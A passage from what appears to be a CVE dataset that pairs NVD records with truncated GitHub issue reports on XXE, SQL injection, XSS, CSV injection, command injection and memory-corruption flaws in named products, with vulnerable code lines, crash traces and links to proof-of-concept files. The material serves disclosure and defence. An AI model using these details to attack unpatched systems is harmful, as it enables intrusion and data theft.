] | 611 | https://github.com/modxcms/revolution/issues/15237 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"modxcms",
"revolution"
] | snipped | XXE Vulnerability | https://api.github.com/repos/modxcms/revolution/issues/15237/comments | 7 | 2020-09-16T14:33:59Z | 2020-09-21T01:02:16Z | https://github.com/modxcms/revolution/issues/15237 | 702,819,250 | 15,237 | 2,730 |
CVE-2020-25912 | 2021-10-31T19:15:09.857 | A XML External Entity (XXE) vulnerability was discovered in symphony\lib\toolkit\class.xmlelement.php in Symphony 2.7.10 which can lead to an information disclosure or denial of service (DOS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://symphony.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/symphonycms/symphonycms/issues/2924"
},
{
"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getsymphony:symphony:2.7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "19FE5DB3-D579-431F-A470-4B9BDDD7BB21",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"611"
] | 611 | https://github.com/symphonycms/symphonycms/issues/2924 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"symphonycms",
"symphonycms"
] | https://github.com/symphonycms/symphonycms/blob/master/symphony/lib/toolkit/class.xmlelement.php
public static function convertFromXMLString($root_element, $xml)
{
$doc = new DOMDocument('1.0', 'utf-8');
$doc->loadXML($xml);
return self::convertFromDOMDocument($root_element, $do... | XXE Vulnerability | https://api.github.com/repos/symphonycms/symphonycms/issues/2924/comments | 1 | 2020-09-21T02:52:43Z | 2021-11-01T12:27:42Z | https://github.com/symphonycms/symphonycms/issues/2924 | 705,248,456 | 2,924 | 2,731 |
CVE-2020-26707 | 2021-10-31T20:15:07.887 | An issue was discovered in the add function in Shenzhim AAPTJS 1.3.1 which allows attackers to execute arbitrary code via the filePath parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/shenzhim/aaptjs/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Part... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:aaptjs_project:aaptjs:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "17215EC6-90DF-41F4-959C-BA2E37CD1DD4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"78"
] | 78 | https://github.com/shenzhim/aaptjs/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"shenzhim",
"aaptjs"
] | It fails to restrict the arbitrary commands in the user input which results in the execution of code(RCE/Information Disclosure/DoS).
https://github.com/shenzhim/aaptjs/blob/f9fab0b5c3530a6d117cc4f98732b4b231c7962f/index.js#L18
Raised the same issue in Hackerone as well with POC.:
https://hackerone.com/reports/996... | Remote Code Execution(RCE) via insecure command formatting | https://api.github.com/repos/shenzhim/aaptjs/issues/2/comments | 0 | 2020-10-02T12:51:33Z | 2020-10-02T12:51:33Z | https://github.com/shenzhim/aaptjs/issues/2 | 713,597,534 | 2 | 2,732 |
CVE-2020-36503 | 2021-11-01T09:15:08.257 | The Connections Business Directory WordPress plugin before 9.7 does not validate or sanitise some connections' fields, which could lead to a CSV injection issue | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6,
"confidentialityImpact": "PART... | [
{
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Connections-Business-Directory/Connections/issues/474"
},
{
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:connections-pro:connections_business_directory:*:*:*:*:*:wordpress:*:*",
"matchCriteriaId": "A480CA1C-2F8E-4CDE-BE42-D1DE152D729A",
"versionEndExcluding": null,
"versionEndIncluding": "9... | [
"1236"
] | 1236 | https://github.com/Connections-Business-Directory/Connections/issues/474 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Connections-Business-Directory",
"Connections"
] | ## Description
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Which lead to hijacking user’s computer by exploiting with untrusted input. In this plugin, all the input fields of [connections_add](http://localhost/wordpress/wp-admin/admin.php?page=connection... | Connections 0.7.3.2 <= 9.6 CSV Injection | https://api.github.com/repos/Connections-Business-Directory/Connections/issues/474/comments | 9 | 2020-05-29T20:57:44Z | 2020-06-24T19:39:58Z | https://github.com/Connections-Business-Directory/Connections/issues/474 | 627,534,307 | 474 | 2,733 |
CVE-2021-22563 | 2021-11-01T13:15:07.657 | Invalid JPEG XL images using libjxl can cause an out of bounds access on a std::vector<std::vector<T>> when rendering splines. The OOB read access can either lead to a segfault, or rendering splines based on other process memory. It is recommended to upgrade past 0.6.0 or patch with https://github.com/libjxl/libjxl/pul... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 3.6,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/735"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Patch",
"Third Party Advi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*",
"matchCriteriaId": "32E466AA-7CFB-4240-8AC9-D7394B5D9AEF",
"versionEndExcluding": "0.6.0",
"versionEndIncluding": null,
"versionStartE... | [
"125"
] | 125 | https://github.com/libjxl/libjxl/issues/735 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"libjxl",
"libjxl"
] | Hello, this 161 byte JPEG-XL image, found via fuzz testing, causes a segfault during decoding (using the latest commit on the `main` branch).
https://github.com/libjxl/libjxl/files/7348994/fuzz39533.jxl.txt
```
==1086695==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fb932913530 (pc 0x00000153da1... | splines: segfault due to out of bounds access of segment array | https://api.github.com/repos/libjxl/libjxl/issues/735/comments | 7 | 2021-10-14T20:01:32Z | 2021-11-01T21:54:23Z | https://github.com/libjxl/libjxl/issues/735 | 1,026,770,643 | 735 | 2,734 |
CVE-2021-22564 | 2021-11-01T13:15:07.713 | For certain valid JPEG XL images with a size slightly larger than an integer number of groups (256x256 pixels) when processing the groups out of order the decoder can perform an out of bounds copy of image pixels from an image buffer in the heap to another. This copy can occur when processing the right or bottom edges ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libjxl/libjxl/issues/708"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7CC7FB7C-9506-45CF-A086-07481ACC16C6",
"versionEndExcluding": null,
"versionEndIncluding": "0.6.0",
"versionStartE... | [
"787"
] | 787 | https://github.com/libjxl/libjxl/issues/708 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libjxl",
"libjxl"
] | Hello,
This crash occurs when a Qt application decode more JXL files at the same time via my [qt-jpegxl-image-plugin](https://github.com/novomesk/qt-jpegxl-image-plugin)
During the crash I see following message:
`/var/tmp/portage/media-libs/libjxl-9999/work/libjxl-9999/lib/jxl/image_ops.h:48: JXL_DASSERT: rect... | Crash during multiple concurrent/parallel decoding | https://api.github.com/repos/libjxl/libjxl/issues/708/comments | 9 | 2021-10-08T08:45:08Z | 2021-11-01T10:36:28Z | https://github.com/libjxl/libjxl/issues/708 | 1,020,849,009 | 708 | 2,735 |
CVE-2020-28702 | 2021-11-01T14:15:07.607 | A SQL injection vulnerability in TopicMapper.xml of PybbsCMS v5.2.1 allows attackers to access sensitive database information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tomoya92/pybbs/issues/137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Par... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pybbs_project:pybbs:5.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "56EBA5D0-DC5B-453F-85D6-9D65A914C615",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"89"
] | 89 | https://github.com/tomoya92/pybbs/issues/137 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tomoya92",
"pybbs"
] | Official website of the manufacturer involved: https://17dev.club/
Source code download address: https://github.com/tomoya92/pybbs
Framework version: V5.2.1
Vulnerability type: SQL injection
Vulnerability status: not fixed
Vulnerability level: high
Code analysis and vulnerability recurrence:
As can be seen fro... | SQL injection vulnerability in version 5.2.1 | https://api.github.com/repos/atjiu/pybbs/issues/137/comments | 1 | 2020-11-05T05:58:18Z | 2020-11-05T08:56:51Z | https://github.com/atjiu/pybbs/issues/137 | 736,637,859 | 137 | 2,736 |
CVE-2021-26739 | 2021-11-01T16:15:07.537 | SQL Injection vulnerability in pay.php in millken doyocms 2.3, allows attackers to execute arbitrary code, via the attribute parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/millken/doyocms/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.co... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:doyocms_project:doyocms:2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0C51EF13-51B0-4A4B-9CD6-445B7EBE3B57",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"89"
] | 89 | https://github.com/millken/doyocms/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"millken",
"doyocms"
] | Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account.
The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect

[crash.zip](https://github.com/trgil/gilcc/files/3992356/crash.zip)
| out-of-bounds array access and bufferoverflow | https://api.github.com/repos/trgil/gilcc/issues/1/comments | 3 | 2019-12-22T10:54:02Z | 2020-02-29T11:29:42Z | https://github.com/trgil/gilcc/issues/1 | 541,435,995 | 1 | 2,743 |
CVE-2020-21573 | 2021-11-02T18:15:08.077 | An issue was discoverered in in abhijitnathwani image-processing v0.1.0, allows local attackers to cause a denial of service via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/abhijitnathwani/image-processing/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
]... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:image-processing_project:image-processing:0.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B2990A14-AAD6-476D-9A2B-A7357984C9D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"400"
] | 400 | https://github.com/abhijitnathwani/image-processing/issues/3 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"abhijitnathwani",
"image-processing"
] | hi, I only modified the input image file and cause stack exhausted. I think variable **_buffer_** should not be defined as a local variable, but should be dynamically applied for heap space. :)
[crash.zip](https://github.com/abhijitnathwani/image-processing/files/3994094/crash.zip)
| Stack exhuasted | https://api.github.com/repos/abhijitnathwani/image-processing/issues/3/comments | 2 | 2019-12-23T07:55:31Z | 2020-07-08T09:18:08Z | https://github.com/abhijitnathwani/image-processing/issues/3 | 541,630,239 | 3 | 2,744 |
CVE-2020-23685 | 2021-11-02T18:15:08.163 | SQL Injection vulnerability in 188Jianzhan v2.1.0, allows attackers to execute arbitrary code and gain escalated privileges, via the username parameter to login.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vtime-tech/188Jianzhan/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Thi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vtimecn:188jianzhan:2.10:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9E7BC5-8E4B-4871-99F4-43C315F868B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"89"
] | 89 | https://github.com/vtime-tech/188Jianzhan/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"vtime-tech",
"188Jianzhan"
] | There is SQL injection vulnerability in the login office of 188Jianzhan, which can bypass WAF and direct universal password without the need to verify the login background.

At line 29... | 118jianzhan v2.10 /Admin/login.php sql injection vulnerability | https://api.github.com/repos/vtime-tech/188Jianzhan/issues/2/comments | 1 | 2020-06-21T09:29:24Z | 2021-08-18T14:53:42Z | https://github.com/vtime-tech/188Jianzhan/issues/2 | 642,528,756 | 2 | 2,745 |
CVE-2020-23718 | 2021-11-02T18:15:08.247 | Cross site scripting (XSS) vulnerability in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the route parameter to index.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Par... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"79"
] | 79 | https://github.com/xujinliang/zibbs/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xujinliang",
"zibbs"
] |
First follow to the index.php entry file, which will load the frame file directly, so just visit the following address
`http://20.20.20.130:8000/zibbs/index.php`
`http://20.20.20.130:8000/zibbs`
Will directly load the framework file and instantiate the framework class
 vulnerability in application/controllers/AdminController.php in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the bbsmeta parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xujinliang/zibbs/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Par... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zibbs_project:zibbs:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8C00A530-FD11-4C90-A706-14BE8213C7F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"79"
] | 79 | https://github.com/xujinliang/zibbs/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xujinliang",
"zibbs"
] | First log in to the background and go to the background Settings,(Compare the storage XSS vulnerabilities of chicken ribs)

Description here(HTML syntax support),Guess there is an XSS vulnerability,Get the pa... | Background setting function parameter【bbsmeta】Storage XSS vulnerabilities | https://api.github.com/repos/xujinliang/zibbs/issues/5/comments | 4 | 2020-06-23T03:15:15Z | 2020-06-23T03:37:38Z | https://github.com/xujinliang/zibbs/issues/5 | 643,496,532 | 5 | 2,747 |
CVE-2021-41238 | 2021-11-02T18:15:08.777 | Hangfire is an open source system to perform background job processing in a .NET or .NET Core applications. No Windows Service or separate process required. Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization f... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Hangfire/issues/1958"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/HangfireIO/Han... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hangfire:hangfire:1.7.25:*:*:*:*:*:*:*",
"matchCriteriaId": "B0C79641-C046-4220-BC96-640A6D4D9E42",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"862"
] | 862 | https://github.com/HangfireIO/Hangfire/issues/1958 | [
"Third Party Advisory"
] | github.com | [
"HangfireIO",
"Hangfire"
] | When using Dashboard version 1.7.24, the dashboard is not accessible from outside of the server (401).
As of version 1.7.25, it is accessible from outside of the server by default.
I have no authorization configured, so by default it should not allow access from outside of the server. | Dashboard accessible from outside by default (since 1.7.25) | https://api.github.com/repos/HangfireIO/Hangfire/issues/1958/comments | 3 | 2021-10-26T10:28:25Z | 2021-10-27T16:17:45Z | https://github.com/HangfireIO/Hangfire/issues/1958 | 1,036,117,302 | 1,958 | 2,749 |
CVE-2021-41036 | 2021-11-03T00:15:08.023 | In versions prior to 1.1 of the Eclipse Paho MQTT C Client, the client does not check rem_len size in readpacket. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "emo@eclipse.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eclipse:paho_mqtt_c\\/c\\+\\+_client:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D118B76A-6E83-4AB0-9701-6248169CB482",
"versionEndExcluding": "1.1.0",
"versionEndIncluding": null,
... | [
"787"
] | 787 | https://github.com/eclipse/paho.mqtt.embedded-c/issues/96 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"eclipse",
"paho.mqtt.embedded-c"
] | in readPacket function, should check rem_len with readbuf_size between step 2 and step 3. | should check rem_len size in readpacket. | https://api.github.com/repos/eclipse-paho/paho.mqtt.embedded-c/issues/96/comments | 3 | 2017-06-21T06:12:07Z | 2021-11-02T23:18:06Z | https://github.com/eclipse-paho/paho.mqtt.embedded-c/issues/96 | 237,425,026 | 96 | 2,750 |
CVE-2020-23109 | 2021-11-03T17:15:08.027 | Buffer overflow vulnerability in function convert_colorspace in heif_colorconversion.cc in libheif v1.6.2, allows attackers to cause a denial of service and disclose sensitive information, via a crafted HEIF file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libheif/issues/207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gith... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libheif:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "70C2B8C8-0EE3-4AAF-8584-F639A0428F03",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | [
"120"
] | 120 | https://github.com/strukturag/libheif/issues/207 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libheif"
] | I spotted this overflow in `heif_colorconversion.cc`.
##### how to reproduce:
```./heif-convert heap-overflow.poc test.png```
[heap-overflow.poc.zip](https://github.com/strukturag/libheif/files/4242885/heap-overflow.poc.zip)
Here is the report of ASAN
```
==19327==ERROR: AddressSanitizer: heap-buffer-overflo... | Heap overflow in heif_colorconversion.cc:2263 | https://api.github.com/repos/strukturag/libheif/issues/207/comments | 9 | 2020-02-24T02:04:49Z | 2025-03-02T17:19:39Z | https://github.com/strukturag/libheif/issues/207 | 569,601,645 | 207 | 2,751 |
CVE-2020-23679 | 2021-11-03T17:15:08.117 | Buffer overflow vulnerability in Renleilei1992 Linux_Network_Project 1.0, allows attackers to execute arbitrary code, via the password field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Renleilei1992/Linux_Network_Project/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linux_network_project:linux_network_project:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7DA1B65-B95B-4EDC-A1E7-5D6D9673EA02",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | [
"120"
] | 120 | https://github.com/Renleilei1992/Linux_Network_Project/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Renleilei1992",
"Linux_Network_Project"
] | 客户端注册用户,输入新密码,未对密码的长度进行校验,存在栈溢出漏洞

| client 注册用户信息,存在栈溢出漏洞 | https://api.github.com/repos/Renleilei1992/Linux_Network_Project/issues/1/comments | 0 | 2020-06-18T17:00:10Z | 2020-06-18T17:00:10Z | https://github.com/Renleilei1992/Linux_Network_Project/issues/1 | 641,396,611 | 1 | 2,752 |
CVE-2021-27836 | 2021-11-03T17:15:08.337 | An issue was discoverered in in function xls_getWorkSheet in xls.c in libxls 1.6.2, allows attackers to cause a denial of service, via a crafted XLS file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libxls/libxls/issues/94"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/mes... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libxls_project:libxls:1.6.2:-:*:*:*:*:*:*",
"matchCriteriaId": "2E85B8CD-C2ED-4D2E-AAEA-D902317DE6F0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"476"
] | 476 | https://github.com/libxls/libxls/issues/94 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"libxls",
"libxls"
] | # libxls xls_parseWorkSheet() - NULL pointer dereference
## INTRODUCTION
A NULL pointer dereference vulnerability has been detected in the function `xls_parseWorkSheet()` when trying to access the `rdi` register that is NULL at that time.
Looking at the code we can realize it is because of trying to access `l... | libxls test.c and test2.c - NULL pointer dereference vulnerability due to xls_parseWorkSheet() misuse | https://api.github.com/repos/libxls/libxls/issues/94/comments | 3 | 2021-02-26T19:58:44Z | 2021-03-02T19:36:53Z | https://github.com/libxls/libxls/issues/94 | 817,625,319 | 94 | 2,753 |
CVE-2021-40985 | 2021-11-03T17:15:08.387 | A stack-based buffer under-read in htmldoc before 1.9.12, allows attackers to cause a denial of service via a crafted BMP image to image_load_bmp. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/commit/f12b9666e582a8e7b70f11b28e5ffc49ad625d43"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1CE1F4-17A1-430E-9C8B-0CE88A07514B",
"versionEndExcluding": "1.9.12",
"versionEndIncluding": null,
"versionSta... | [
"125"
] | 125 | https://github.com/michaelrsweet/htmldoc/issues/444 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"michaelrsweet",
"htmldoc"
] | os: ubuntu 20.04
htmldoc version: master branch
command : ./htmldoc --webpage -f out.pdf ./poc.html
[poc.zip](https://github.com/michaelrsweet/htmldoc/files/6915210/poc.zip)
asan report
```
=================================================================
==100970==ERROR: AddressSanitizer: stack-buffer-und... | stack-buffer-underflow in htmldoc | https://api.github.com/repos/michaelrsweet/htmldoc/issues/444/comments | 2 | 2021-08-02T07:44:48Z | 2021-11-08T01:45:06Z | https://github.com/michaelrsweet/htmldoc/issues/444 | 957,859,917 | 444 | 2,754 |
CVE-2020-18263 | 2021-11-03T18:15:07.953 | PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability in the component search.php via the search parameter. This vulnerability allows attackers to access sensitive database information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/harshitbansal373/PHP-CMS/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"T... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:php-cms_project:php-cms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA113E26-6E50-41D9-8696-9674DDCC34F5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"89"
